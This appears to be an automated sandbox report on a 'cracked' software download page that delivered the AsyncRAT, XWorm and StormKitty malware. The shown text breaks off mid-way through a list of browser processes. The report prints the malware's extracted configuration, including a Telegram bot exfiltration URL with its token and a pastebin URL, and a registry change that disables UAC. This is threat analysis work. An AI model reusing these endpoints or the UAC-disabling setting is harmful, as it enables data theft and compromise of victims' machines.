asyncrat | hxxps://crackia[.]com/topic/91908-exm-tweaking-utility-premium-v10-cracked/

Resubmissions

06-12-2024 21:23

241206-z8xkxavjel 10

28-09-2024 23:06

240928-23lbssshng 10

Analysis

max time kernel
149s
max time network
147s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
06-12-2024 21:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://crackia.com/topic/91908-exm-tweaking-utility-premium-v10-cracked/

Score

10^/10

asyncrat stormkitty xworm default discovery evasion execution phishing rat stealer trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%LocalAppData%
install_file
USB.exe
pastebin_url
https://pastebin.com/raw/ZnhxAV6a
telegram
https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0006000000025afb-1164.dat	family_xworm
behavioral1/memory/240-1192-0x00000000004F0000-0x000000000051A000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000f000000025afc-1170.dat	family_stormkitty
behavioral1/memory/404-1197-0x0000000000540000-0x000000000057E000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000f000000025afc-1170.dat	family_asyncrat

A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing

Executes dropped EXE 3 IoCs

pid	Process
1936	EXMservice.exe
240	msedge.exe
404	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
29	raw.githubusercontent.com
116	raw.githubusercontent.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5052	powershell.exe
2900	powershell.exe
1532	powershell.exe
1276	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

NTFS ADS 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\EXM Premium Tweaking Utility 1.0 Cracked.bat:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 986065.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\EXMPremiumTweaker.bat:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 719292.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
1448	msedge.exe
1448	msedge.exe
2756	msedge.exe
2756	msedge.exe
3104	identity_helper.exe
3104	identity_helper.exe
3488	msedge.exe
3488	msedge.exe
5020	msedge.exe
5020	msedge.exe
5052	powershell.exe
5052	powershell.exe
5052	powershell.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4904	msedge.exe
4904	msedge.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
1276	powershell.exe
1276	powershell.exe
1276	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 30 IoCs

pid	Process
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5052	powershell.exe
Token: SeIncreaseQuotaPrivilege	1360	WMIC.exe
Token: SeSecurityPrivilege	1360	WMIC.exe
Token: SeTakeOwnershipPrivilege	1360	WMIC.exe
Token: SeLoadDriverPrivilege	1360	WMIC.exe
Token: SeSystemProfilePrivilege	1360	WMIC.exe
Token: SeSystemtimePrivilege	1360	WMIC.exe
Token: SeProfSingleProcessPrivilege	1360	WMIC.exe
Token: SeIncBasePriorityPrivilege	1360	WMIC.exe
Token: SeCreatePagefilePrivilege	1360	WMIC.exe
Token: SeBackupPrivilege	1360	WMIC.exe
Token: SeRestorePrivilege	1360	WMIC.exe
Token: SeShutdownPrivilege	1360	WMIC.exe
Token: SeDebugPrivilege	1360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1360	WMIC.exe
Token: SeRemoteShutdownPrivilege	1360	WMIC.exe
Token: SeUndockPrivilege	1360	WMIC.exe
Token: SeManageVolumePrivilege	1360	WMIC.exe
Token: 33	1360	WMIC.exe
Token: 34	1360	WMIC.exe
Token: 35	1360	WMIC.exe
Token: 36	1360	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1360	WMIC.exe
Token: SeSecurityPrivilege	1360	WMIC.exe
Token: SeTakeOwnershipPrivilege	1360	WMIC.exe
Token: SeLoadDriverPrivilege	1360	WMIC.exe
Token: SeSystemProfilePrivilege	1360	WMIC.exe
Token: SeSystemtimePrivilege	1360	WMIC.exe
Token: SeProfSingleProcessPrivilege	1360	WMIC.exe
Token: SeIncBasePriorityPrivilege	1360	WMIC.exe
Token: SeCreatePagefilePrivilege	1360	WMIC.exe
Token: SeBackupPrivilege	1360	WMIC.exe
Token: SeRestorePrivilege	1360	WMIC.exe
Token: SeShutdownPrivilege	1360	WMIC.exe
Token: SeDebugPrivilege	1360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1360	WMIC.exe
Token: SeRemoteShutdownPrivilege	1360	WMIC.exe
Token: SeUndockPrivilege	1360	WMIC.exe
Token: SeManageVolumePrivilege	1360	WMIC.exe
Token: 33	1360	WMIC.exe
Token: 34	1360	WMIC.exe
Token: 35	1360	WMIC.exe
Token: 36	1360	WMIC.exe
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeIncreaseQuotaPrivilege	200	WMIC.exe
Token: SeSecurityPrivilege	200	WMIC.exe
Token: SeTakeOwnershipPrivilege	200	WMIC.exe
Token: SeLoadDriverPrivilege	200	WMIC.exe
Token: SeSystemProfilePrivilege	200	WMIC.exe
Token: SeSystemtimePrivilege	200	WMIC.exe
Token: SeProfSingleProcessPrivilege	200	WMIC.exe
Token: SeIncBasePriorityPrivilege	200	WMIC.exe
Token: SeCreatePagefilePrivilege	200	WMIC.exe
Token: SeBackupPrivilege	200	WMIC.exe
Token: SeRestorePrivilege	200	WMIC.exe
Token: SeShutdownPrivilege	200	WMIC.exe
Token: SeDebugPrivilege	200	WMIC.exe
Token: SeSystemEnvironmentPrivilege	200	WMIC.exe
Token: SeRemoteShutdownPrivilege	200	WMIC.exe
Token: SeUndockPrivilege	200	WMIC.exe
Token: SeManageVolumePrivilege	200	WMIC.exe
Token: 33	200	WMIC.exe
Token: 34	200	WMIC.exe

Suspicious use of FindShellTrayWindow 45 IoCs

pid	Process
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2756 wrote to memory of 2952	2756	msedge.exe	77
PID 2756 wrote to memory of 2952	2756	msedge.exe	77
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 2132	2756	msedge.exe	78
PID 2756 wrote to memory of 1448	2756	msedge.exe	79
PID 2756 wrote to memory of 1448	2756	msedge.exe	79
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80
PID 2756 wrote to memory of 4412	2756	msedge.exe	80

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://crackia.com/topic/91908-exm-tweaking-utility-premium-v10-cracked/
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe5a9e3cb8,0x7ffe5a9e3cc8,0x7ffe5a9e3cd8
  2⤵
  PID:2952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:2
  2⤵
  PID:2132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
  2⤵
  PID:4412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:3552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
  2⤵
  PID:4120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4104 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
  2⤵
  PID:1120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:3184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
  2⤵
  PID:1612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
  2⤵
  PID:3348
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5616 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
  2⤵
  PID:1564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:1
  2⤵
  PID:5104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
  2⤵
  PID:3608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:1
  2⤵
  PID:4380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6752 /prefetch:1
  2⤵
  PID:3976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1
  2⤵
  PID:5064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6772 /prefetch:1
  2⤵
  PID:2880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
  2⤵
  PID:1388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:1
  2⤵
  PID:2800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
  2⤵
  PID:3848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1220 /prefetch:1
  2⤵
  PID:4452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
  2⤵
  PID:1132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
  2⤵
  PID:1036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6044 /prefetch:8
  2⤵
  PID:4520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
  2⤵
  PID:1488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1
  2⤵
  PID:2848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
  2⤵
  PID:2384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
  2⤵
  PID:2560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
  2⤵
  PID:4136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
